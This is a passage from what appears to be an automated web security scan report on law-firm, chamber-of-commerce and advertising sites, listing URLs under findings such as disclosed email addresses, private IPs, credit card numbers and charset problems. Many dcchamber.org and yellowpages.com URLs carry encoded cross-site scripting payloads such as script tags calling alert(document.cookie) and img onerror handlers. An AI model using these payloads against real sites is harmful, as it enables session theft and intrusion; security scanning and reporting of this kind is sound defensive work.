17.120. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WBJ.png

17.121. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WCSA.PNG

17.122. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wachovia_A_Wells_Fargo_Company.PNG

17.123. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wal-Mart.PNG

17.124. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WashingtonGas[1].PNG

17.125. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_ace.png

17.126. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_comcast.png

17.127. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_verizon.png

17.128. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/bbandt.PNG

17.129. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/deloitte.png

17.130. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/hsbc.PNG

17.131. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/mcdean.PNG

17.132. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/octt.PNG

17.133. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pepco2.PNG

17.134. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pfizer_logo.PNG

17.135. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_Foundation_off.gif

17.136. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_NGL_off.gif

17.137. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_about_off.gif

17.138. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_chamberNews_off.gif

17.139. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_events_off.gif

17.140. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_governmentRelations_off.gif

17.141. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_memberNews_off.gif

17.142. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_membership_off.gif

17.143. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_visitorInfo_off.gif

17.144. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/dc_logo.jpg

17.145. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_email.gif

17.146. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_gallery.gif

17.147. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_home.gif

17.148. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/search_button.jpg

17.149. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_email_icon.gif

17.150. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_title_navigation.gif

17.151. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/stylesheet.css

17.152. http://www.dccouncil.washington.dc.us/dcofficialcode

17.153. http://www.directstartv.com/

17.154. http://www.dwi-law.com/

17.155. http://www.dykema.com/

17.156. http://www.ebglaw.com/404.aspx

17.157. http://www.ebglaw.com/showoffice.aspx

17.158. http://www.facebook.com/%s

17.159. http://www.filamentgroup.com/

17.160. http://www.filamentgroup.com/lab/retaining_scalable_interfaces_with_pixel_to_em_conversion/

17.161. http://www.flickr.com/photos/darkstream/

17.162. http://www.flickr.com/photos/plutor/1818329845/

17.163. http://www.gross.com/

17.164. http://www.hagenhosting.com/

17.165. http://www.hldataprotection.com/

17.166. http://www.hoganlovells.com/

17.167. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/

17.168. http://www.hoganlovells.com/aboutus/history/

17.169. http://www.hoganlovells.com/aboutus/overview/

17.170. http://www.hoganlovells.com/de/

17.171. http://www.hoganlovells.com/es/

17.172. http://www.hoganlovells.com/fr/

17.173. http://www.hoganlovells.com/industries/

17.174. http://www.hoganlovells.com/ja/

17.175. http://www.hoganlovells.com/newsmedia/awardsrankings/

17.176. http://www.hoganlovells.com/newsmedia/fastfacts/

17.177. http://www.hoganlovells.com/newsmedia/newspubs/

17.178. http://www.hoganlovells.com/newsmedia/newspubs/List.aspx

17.179. http://www.hoganlovells.com/newsmedia/newspubs/detail.aspx

17.180. http://www.hoganlovells.com/newsmedia/timeline/

17.181. http://www.hoganlovells.com/offices/

17.182. http://www.hoganlovells.com/ourpeople/

17.183. http://www.hoganlovells.com/ourpeople/List.aspx

17.184. http://www.hoganlovells.com/practiceAreas/area.aspx

17.185. http://www.hoganlovells.com/practiceareas/

17.186. http://www.hoganlovells.com/ru/

17.187. http://www.hoganlovells.com/splash/alumni/

17.188. http://www.hoganlovells.com/zh-CHS/

17.189. http://www.info.com/washington%20dc%20law%20firms

17.190. http://www.kasimer-ittig.com/

17.191. http://www.keen.com/

17.192. http://www.koonz.com/

17.193. http://www.law.georgetown.edu/

17.194. http://www.local.com/results.aspx

17.195. http://www.local.com/results.aspx

17.196. http://www.matneylawfirm.com/

17.197. http://www.naegele.com/

17.198. http://www.nleomf.org/x22

17.199. http://www.nylontechnology.com/

17.200. http://www.opensource.org/licenses

17.201. http://www.opensource.org/licenses/gpl-license.php

17.202. http://www.opensource.org/licenses/lgpl-license.php

17.203. http://www.opensource.org/licenses/mit-license.php

17.204. http://www.petrillopowell.com/

17.205. http://www.rofgw.com/

17.206. http://www.romingerlegal.com/state/districtcolumbia.html

17.207. http://www.samakowlaw.com/

17.208. http://www.sheriabrams.com/

17.209. http://www.skadden.com/

17.210. http://www.skadden.com/2011insights.cfm

17.211. http://www.skadden.com/alumni/Index.cfm

17.212. http://www.skadden.com/index.cfm

17.213. http://www.unica.com/

17.214. http://www.usdirectory.com/gypr.aspx

17.215. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

17.216. http://www.vault.com/wps/portal/usa/rankings/individual

17.217. http://www.weil.com/

17.218. http://www.wileyrein.com/

17.219. http://www.wileyrein.com/index.cfm

17.220. http://www.wileyrein.com/x22

17.221. http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a

17.222. http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a

17.223. http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a

17.224. http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/a

18. File upload functionality

19. Email addresses disclosed

19.1. http://adomas.org/javascript-mouse-wheel/

19.2. http://ads.adbrite.com/adserver/behavioral-data/8201

19.3. http://ads.gmodules.com/gadgets/makeRequest

19.4. http://betalabs.yellowpages.com/

19.5. http://bigbangcafe.net/

19.6. http://code.google.com/p/swfobject/

19.7. http://dcregistry.com/computer.html

19.8. http://dcregistry.com/jobs.html

19.9. http://dcregistry.com/lawfirms.html

19.10. http://dcregistry.com/other.html

19.11. http://dcregistry.com/shopping.html

19.12. http://fancybox.net/

19.13. http://financaspessoais.blog.br/wp-content/plugins/wpaudio-mp3-player/wpaudio.min.js

19.14. http://groups.google.com/groups

19.15. http://groups.google.com/groups

19.16. https://hoganlovells.wufoo.com/forms/q7x3a1/

19.17. http://jqueryui.com/about

19.18. http://kevin.lexblog.com/2011/01/articles/legal-news-lexblogosphere/best-in-law-blogs-the-lexblog-network-january-5-2010/

19.19. http://kevin.lexblog.com/2011/01/articles/legal-news-lexblogosphere/best-in-law-blogs-the-lexblog-network-january-5-2011/

19.20. http://landesm.gfi.com/event-log-analysis-sm/

19.21. https://login.yahoo.com/config/login

19.22. http://mergulhao.info/

19.23. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

19.24. http://nonprofitlaw.com/

19.25. http://rafael.adm.br/wp-content/themes/mainstream/includes/js/pngfix.js

19.26. http://rafaelss.com/

19.27. http://s.meebocdn.net/cim/script/cim_v89_cim_10_3_8.en.js

19.28. https://sites.google.com/a/mayberrylawfirm.com/learnestateplanning/

19.29. http://skaddenpractices.skadden.com/fca/

19.30. http://skaddenpractices.skadden.com/hc/

19.31. http://skaddenpractices.skadden.com/sec/index.php

19.32. http://twittercounter.com/rafaelp

19.33. http://webcache.googleusercontent.com/search

19.34. http://www.abanet.org/x22

19.35. http://www.abelsonlaw.com/

19.36. http://www.arnoldporter.com/about_the_firm_pro_bono_our_commitment.cfm

19.37. http://www.arnoldporter.com/events.cfm

19.38. http://www.arnoldporter.com/globals_privacy_policy.cfm

19.39. http://www.ashcraftandgerel.com/

19.40. http://www.att.com/

19.41. http://www.cov.com/en-US/regions/middle_east/

19.42. http://www.cov.com/health_care/health_care_reform/

19.43. http://www.cov.com/industry/financial_services/dodd_frank/

19.44. http://www.cov.com/ja-JP/practice/region.aspx

19.45. http://www.cov.com/ko-KR/practice/region.aspx

19.46. http://www.cov.com/zh-CN/practice/region.aspx

19.47. http://www.crowell.com/Global/ContactUs.aspx

19.48. http://www.crowell.com/Global/TermsOfUse.aspx

19.49. http://www.crowell.com/NewsEvents/PressRelease.aspx

19.50. http://www.crowell.com/fckeditor/fckeditor.js

19.51. http://www.dcchamber.org/chamber/memberDetail.asp

19.52. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/cache/sql/fba/fs_1.jpg

19.53. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AIR_Logo_hotsoup.PNG

19.54. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AUlogo.PNG

19.55. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Akridge.PNG

19.56. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Cardinal.PNG

19.57. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Carefirst.PNG

19.58. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CityPaper.png

19.59. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Copy%20of%20ACS%20Logo.PNG

19.60. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CordiaLogo.PNG

19.61. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/DCLottery.png

19.62. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/FEDEX_CORP_LOGO1%20(2).PNG

19.63. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/GWU_Logo.PNG

19.64. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/HollandKnight.PNG

19.65. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Howard%20University.PNG

19.66. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MacFarlane%20Partners.PNG

19.67. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/MedStar.PNG

19.68. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Miller&Long.gif

19.69. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/PNC_RGB.PNG

19.70. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/ReedSmith.PNG

19.71. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/SecuritasLogo.PNG

19.72. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/UDC.PNG

19.73. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WBJ.png

19.74. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WCSA.PNG

19.75. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wachovia_A_Wells_Fargo_Company.PNG

19.76. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Wal-Mart.PNG

19.77. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/WashingtonGas[1].PNG

19.78. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_ace.png

19.79. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_comcast.png

19.80. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/banner_verizon.png

19.81. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/bbandt.PNG

19.82. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/deloitte.png

19.83. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/hsbc.PNG

19.84. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/mcdean.PNG

19.85. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/octt.PNG

19.86. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pepco2.PNG

19.87. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/pfizer_logo.PNG

19.88. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_Foundation_off.gif

19.89. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_NGL_off.gif

19.90. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_about_off.gif

19.91. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_chamberNews_off.gif

19.92. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_events_off.gif

19.93. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_governmentRelations_off.gif

19.94. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_memberNews_off.gif

19.95. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_membership_off.gif

19.96. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_visitorInfo_off.gif

19.97. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/dc_logo.jpg

19.98. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_email.gif

19.99. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_gallery.gif

19.100. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_home.gif

19.101. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/search_button.jpg

19.102. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_email_icon.gif

19.103. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_title_navigation.gif

19.104. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/stylesheet.css

19.105. http://www.dccouncil.washington.dc.us/dcofficialcode

19.106. http://www.directstartv.com/

19.107. http://www.dwi-law.com/

19.108. http://www.dykema.com/

19.109. http://www.ebglaw.com/js/jquery.mousewheel.js

19.110. http://www.ebglaw.com/showoffice.aspx

19.111. http://www.filamentgroup.com/

19.112. http://www.filamentgroup.com/lab/retaining_scalable_interfaces_with_pixel_to_em_conversion/

19.113. http://www.fulbright.com/aop

19.114. http://www.fulbright.com/fjLib/js/prototype.js

19.115. http://www.fulbright.com/index.cfm

19.116. http://www.fulbright.com/industries

19.117. http://www.gnu.org/licenses/

19.118. http://www.gnu.org/licenses/gpl.html

19.119. http://www.goldsmithfirm.com/

19.120. http://www.gross.com/

19.121. http://www.hoganlovells.com/FCWSite/Include/incFlashDetect.js

19.122. http://www.hoganlovells.com/newsmedia/newspubs/detail.aspx

19.123. http://www.hoganlovells.com/ourpeople/List.aspx

19.124. http://www.internet-law-firm.com/

19.125. http://www.jenkens.com/

19.126. http://www.jonesday.com/admin/rss.aspx

19.127. http://www.jonesday.com/experiencepractices/

19.128. http://www.jonesday.com/intellectual_property/

19.129. http://www.jonesdaycareers.com/opportunities/

19.130. http://www.llsdc.org/

19.131. http://www.local.com/business/v3/js/globalbusiness_3_5.js

19.132. http://www.local.com/js/s_code.js

19.133. http://www.matneylawfirm.com/

19.134. http://www.nankin.com/

19.135. http://www.nleomf.org/x22

19.136. http://www.nutter.com/careers.php

19.137. http://www.opensource.org/licenses

19.138. http://www.opensource.org/licenses/gpl-license.php

19.139. http://www.opensource.org/licenses/lgpl-license.php

19.140. http://www.opensource.org/licenses/mit-license.php

19.141. http://www.pepperlaw.com/

19.142. http://www.political.cov.com/

19.143. http://www.randlaw.com/

19.144. http://www.romingerlegal.com/state/districtcolumbia.html

19.145. http://www.sheriabrams.com/

19.146. http://www.skadden.com/Index.cfm

19.147. http://www.slideshare.net/rss/slideshow/id/4969556

19.148. http://www.taxesq.com/

19.149. http://www.torrilegalservices.com/

19.150. http://www.vatrafficlaw.com/

19.151. http://www.vault.com/scripts/jquery.swapimage.min.js

19.152. http://www.vault.com/scripts/main.js

19.153. http://www.w3.org/TR/html4/DTD/strict.dtd

19.154. http://www.w3.org/TR/html4/strict.dtd

19.155. http://www.washlaw.com/

19.156. http://www.wcl.american.edu/

19.157. http://www.wileyrein.com/js/script.js

20. Private IP addresses disclosed

20.1. http://cdn.gigya.com/JS/socialize.js

20.2. http://contact.collinscollege.edu/college-degrees.aspx

20.3. http://www.google.com/sdch/GeNLY2f-.dct

20.4. http://www.nleomf.org/x22

20.5. http://www.unica.com/

21. Credit card numbers disclosed

21.1. http://ad.doubleclick.net/adj/locm.sp

21.2. http://br.search.yahoo.com/search

21.3. http://www.hoganlovells.com/files/Publication/7871edd4-f660-4f47-811a-539ef0d25b84/Presentation/PublicationAttachment/04e62785-8fe2-40c3-a8cb-556982a16ea7/FDPF1_final.pdf

21.4. http://www.hoganlovells.com/ourpeople/List.aspx

22. Cacheable HTTPS response

22.1. https://alumni.hhlaw.com/pages/Framework.aspx

22.2. https://cim.meebo.com/cim/connect_v89_cim_10_3_8.php

22.3. https://hoganlovells.wufoo.com/forms/q7x3a1/

22.4. https://immigration.ebglaw.com/TrkrSSL.html

22.5. https://sites.google.com/a/mayberrylawfirm.com/learnestateplanning/

22.6. https://socialize.gigya.com/gs/bookmark.aspx

22.7. https://trgc.opt.fimserve.com/

23. Multiple content types specified

23.1. http://translate.googleapis.com/translate_static/js/element/main.js

23.2. http://www.goldsmithfirm.com/

24. HTML does not specify charset

24.1. http://ad.doubleclick.net/adi/N4319.126328.SPECIFICMEDIA/B5112094.2

24.2. http://ad.doubleclick.net/clk

24.3. http://ad.doubleclick.net/pfadx/csmonitor_cim/

24.4. http://ad.yieldmanager.com/iframe3

24.5. http://ads.specificmedia.com/serve/v=5

24.6. http://afe.specificclick.net/

24.7. https://ams-legal.net/mlalaw/default.asp

24.8. http://api.tweetmeme.com/button.js

24.9. http://brett-zamir.me/

24.10. http://d13.zedo.com/OzoDB/cutils/R52_5/jsc/1099/zpu.html

24.11. http://d3.zedo.com/jsc/d3/ff2.html

24.12. http://dcregistry.com/cgi-bin/surveys/survey.cgi

24.13. http://dcregistry.com/cgi-bin/wbn2/wbn.pl

24.14. http://dcregistry.com/lawfirms.html

24.15. http://dcregistry.com/users/CVCalhoun/index.html

24.16. http://ds.addthis.com/red/psi/sites/www.csmonitor.com/p.json

24.17. http://ds.addthis.com/red/psi/sites/www.wileyrein.com/p.json

24.18. http://jonesdayv2wc.staged.hubbardone.com/newsknowledge/newsdetail.aspx

24.19. http://jqueryui.com/about

24.20. http://loadus.exelator.com/load/net.php

24.21. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

24.22. http://pbid.pro-market.net/engine

24.23. http://s.meebocdn.net/cim/script/

24.24. http://s.meebocdn.net/cim/skin_v89_cim_10_3_8/

24.25. http://s.meebocdn.net/cim/skin_v89_cim_10_3_8/img/

24.26. http://skaddenpractices.skadden.com/

24.27. http://skaddenpractices.skadden.com/sec/images/tools_doc.gif

24.28. http://skaddenpractices.skadden.com/sec/images/tools_mail.gif

24.29. http://skaddenpractices.skadden.com/sec/images/tools_phone.gif

24.30. http://skaddenpractices.skadden.com/sec/scripts/resize.gif

24.31. http://REDACTED.com/ds/I2IWCTHD1THD/

24.32. http://spirerandgoldberg.com/

24.33. http://statistics.wibiya.com/SetToolbarLoad.php

24.34. http://tags.bluekai.com/site/857

24.35. http://REDACTED

24.36. http://REDACTED

24.37. http://www.arentfox.com/x22

24.38. http://www.bleedingego.co.uk/webdev.php

24.39. http://www.cgllaw.com/

24.40. http://www.creditors-law.com/

24.41. http://www.dcregistry.com/ns6side.htm

24.42. http://www.dsmo.com/

24.43. http://www.dykema.com/

24.44. http://www.e-classifieds.net/

24.45. http://www.farkaslaw.com/

24.46. http://www.fulbright.com/index.cfm

24.47. http://www.g-s.com/x22/x3e/x3cimg

24.48. http://www.g-s.com/x22/x3eGarrison

24.49. http://www.hagenhosting.com/

24.50. http://www.hagensoftware.com/

24.51. http://www.his.com/~rjk/

24.52. http://www.hylindsearch.com/

24.53. http://www.keen.com/

24.54. http://www.law2001.com/

24.55. http://www.learnestateplanning.com/

24.56. http://www.marshalltaheri.com/x22

24.57. http://www.myadvocate.com/jlcohen/

24.58. http://www.nutter.com/careers.php

24.59. http://www.shsl.com/

24.60. http://www.sniderlaw.com/x22

24.61. http://www.storchbrenner.com/

24.62. http://www.tatebywater.com/

24.63. http://www.technologylaw.com/

24.64. http://www.torrilegalservices.com/

24.65. http://www.vault.com/favicon.ico

24.66. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

24.67. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

25. HTML uses unrecognised charset

25.1. http://sorgalla.com/

25.2. http://sorgalla.com/jcarousel/

25.3. http://www.ebglaw.com/404.aspx

25.4. http://www.ebglaw.com/showoffice.aspx

25.5. http://www.vatrafficlaw.com/

26. Content type incorrectly stated

26.1. http://ad.doubleclick.net/clk

26.2. http://ad.doubleclick.net/pfadx/csmonitor_cim/

26.3. http://ads.gmodules.com/gadgets/ifr

26.4. http://ads.gmodules.com/gadgets/makeRequest

26.5. http://afe.specificclick.net/

26.6. http://api.tweetmeme.com/button.js

26.7. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js

26.8. http://domains.googlesyndication.com/domainads/search

26.9. http://jonesdayv2wc.staged.hubbardone.com/newsknowledge/newsdetail.aspx

26.10. http://lt.navegg.com/g.lt

26.11. http://static-vip.school9.com/images/aqua/images/bottom_searchbg.jpg

26.12. http://translate.googleapis.com/translate_a/t

26.13. http://twittercounter.com/embed/

26.14. http://v6test.cdn.att.net/special.jpg

26.15. http://wsdsapi.infospace.com/infomaster/widgets

26.16. http://www.arnoldporter.com//images/iTunesButton.jpg

26.17. http://www.crowell.com/Global/SuccessStories.aspx

26.18. http://www.dsmo.com/

26.19. http://www.fulbright.com/index.cfm

26.20. http://www.g-s.com/x22/x3e/x3cimg

26.21. http://www.g-s.com/x22/x3eGarrison

26.22. http://www.jonesday.com/FCWSite/Img/sitev2/gray_spacer.gif

